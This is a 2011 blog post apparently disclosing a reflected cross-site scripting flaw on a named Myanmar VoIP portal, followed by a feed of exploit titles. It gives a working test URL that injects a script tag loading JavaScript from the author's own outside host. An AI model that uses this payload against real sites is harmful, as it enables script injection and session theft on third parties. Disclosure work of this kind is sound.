critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Home / Hacking, News, Security / critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

September 28, 2011 PlanetCreator 0 Comments 0 tags

PlanetCreator has reported another critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

This vulnerability has been informed to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Test Link

http://voip.yatanarpon.com.mm/myanmar-webportal/index.jsp?msg=<script src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js></script>

We hope that your security staff will look into this issue and fix it as soon as possible.

[remote] Vite 6.2.2 - Arbitrary File Read
on April 3, 2025 at 12:00 am
Vite 6.2.2 - Arbitrary File Read
[webapps] Nagios Log Server 2024R1.3.1 - Stored XSS
on April 3, 2025 at 12:00 am
Nagios Log Server 2024R1.3.1 - Stored XSS
[remote] Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
on April 3, 2025 at 12:00 am
Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
[webapps] ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
on April 3, 2025 at 12:00 am
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
[webapps] Webmin Usermin 2.100 - Username Enumeration
on April 3, 2025 at 12:00 am
Webmin Usermin 2.100 - Username Enumeration

critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Explore More

What’s Next for Virtualization: Optimizing the Environment

What are the countermeasures against database attacks?

VNC Man in the Middle Exploit Code